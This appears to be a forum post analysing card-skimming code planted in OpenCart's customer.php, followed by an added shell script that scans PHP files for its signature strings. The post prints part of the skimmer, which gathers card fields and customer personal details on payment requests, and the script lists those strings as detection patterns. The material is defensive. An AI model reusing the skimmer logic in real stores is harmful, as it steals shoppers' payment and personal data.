The code does no harm to the store owners, but it seems to harm your clients instead. It seems to be stealing credit card information.
A quick look at the code shows their data being packed into a binary string.
Code:
pack("H*",substr($h,$i,2))
Code:
]) && substr($req['route'],0,8)=='payment/') { if(isset($req['cc_number']) || isset($req['ccnum']) || isset($req['CardNumber']) || isset($req['cardNumber']) || isset($req['cardnumber']) || isset($req['transaction']['credit_card']) || isset($req['fatzebra']) || isset($req['payment']['cc_number']) || isset($req['webpos_cc_number'])) { $df=DB_PREFIX; $ccc=$db->query("SELECT ".$df."customer.customer_id,".$df."customer.firstname, ".$df."customer.lastname, ".$df."customer.email, ".$df."customer.telephone, ".$df."customer.ip, ".$df."address.firstname as a_fn, ".$df."address.lastname as a_ln, ".$df."address.company, ".$df."address.address_1, ".$df."address.address_2, ".$df."address.city, ".$df."address.postcode, ".$df."country.iso_code_3, ".$df."zone.code, ".$df."zone.name FROM ".$df."customer LEFT JOIN ".$df."address ON ".$df."customer.customer_id=".$df."address.customer_id LEFT JOIN ".$df."country ON ".$df."address.country_id=".$df."country.country_id LEFT JOIN ".$df."zone ON ".$df."address.zone_id=".$df."zone.zone_id WHERE ".$df."customer.customer_id = '".(int)$ses['customer_id']."' AND ".$df."address.address_id = '".(int)$ses['payment_address_id']."'"); $sr='err'; if ($ccc->num_rows) { $sr=time().'|'.implode("|",array_merge($ccc->row,array(serialize($req)))); } elseif(isset($ses['guest'])) { $gs=$ses["guest"]; $pay=$ses["guest"]["payment"]; 
$sr=time().'|-1|'.(isset($gs['firstname'])?$gs['firstname']:'').'|'.(isset($gs['lastname'])?$gs['lastname']:'').'|'.(isset($gs['email'])?$gs['email']:'').'|'.(isset($gs['telephone'])?$gs['telephone']:'').'|'.(@$_SERVER['REMOTE_ADDR']).'|'.(isset($pay['firstname'])?$pay['firstname']:'').'|'.(isset($pay['lastname'])?$pay['lastname']:'').'|'.(isset($pay['company'])?$pay['company']:'').'|'.(isset($pay['address_1'])?$pay['address_1']:'').'|'.(isset($pay['address_2'])?$pay['address_2']:'').'|'.(isset($pay['city'])?$pay['city']:'').'|'.(isset($pay['postcode'])?$pay['postcode']:'').'|'.(isset($pay['iso_code_3'])?$pay['iso_code_3']:'').'|'.(isset($pay['zone_code'])?$pay['zone_code']:'').'|'.(isset($pay['zone'])?$pay['zone']:'').'|'.serialize($req); }
1. Look at your OpenCart installation's download folder. Remove files that aren't meant to be in there.
2. Look at your encryption key, ensure it's no longer 12345.
3. Look at your system/library/customer.php file and ensure there's no code that looks like the following:
Code:
function h2b($h) {
That should be all.
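One way to run the third check over every PHP file in an installation, as an added example that is not part of the original post: it searches for the strings quoted in the post (the h2b function, the pack("H*",substr( call, the card-field isset tests and serialize($req)). The function names and the sample files are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the post. Usage after sourcing this file:
#   scan_tree /path/to/opencart
# Spaces and tabs are stripped before matching so a re-indented copy of the
# injected code still hits. A hit means "review this file by hand".

# count_indicators FILE -> prints how many of the post's strings appear in FILE
count_indicators() {
    n=0
    while IFS= read -r pat; do
        hit=$(tr -d ' \t' < "$1" | grep -nF -- "$pat" | cut -d: -f1 | tr '\n' ' ')
        if [ -n "$hit" ]; then
            printf '%s: "%s" at line(s) %s\n' "$1" "$pat" "$hit" >&2
            n=$((n + 1))
        fi
    done <<'EOF'
functionh2b(
pack("H*",substr(
isset($req['cc_number'])
isset($req['webpos_cc_number'])
serialize($req)
EOF
    echo "$n"
}

# scan_tree DIR -> prints the path of every .php file with at least one hit
scan_tree() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if [ "$(count_indicators "$f" 2>/dev/null)" -gt 0 ]; then
            echo "$f"
        fi
    done
}

# Constructed sample files for a stand-alone run (not real store files).
make_samples() {
    d=$(mktemp -d)
    mkdir -p "$d/system/library"
    cat > "$d/system/library/customer.php" <<'EOF'
<?php
function h2b( $h ) { /* body omitted in this constructed sample */ }
EOF
    printf '<?php\nclass Cart {}\n' > "$d/system/library/cart.php"
    echo "$d"
}
```

count_indicators writes the matching line numbers to stderr, so calling it directly on system/library/customer.php shows where to look.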
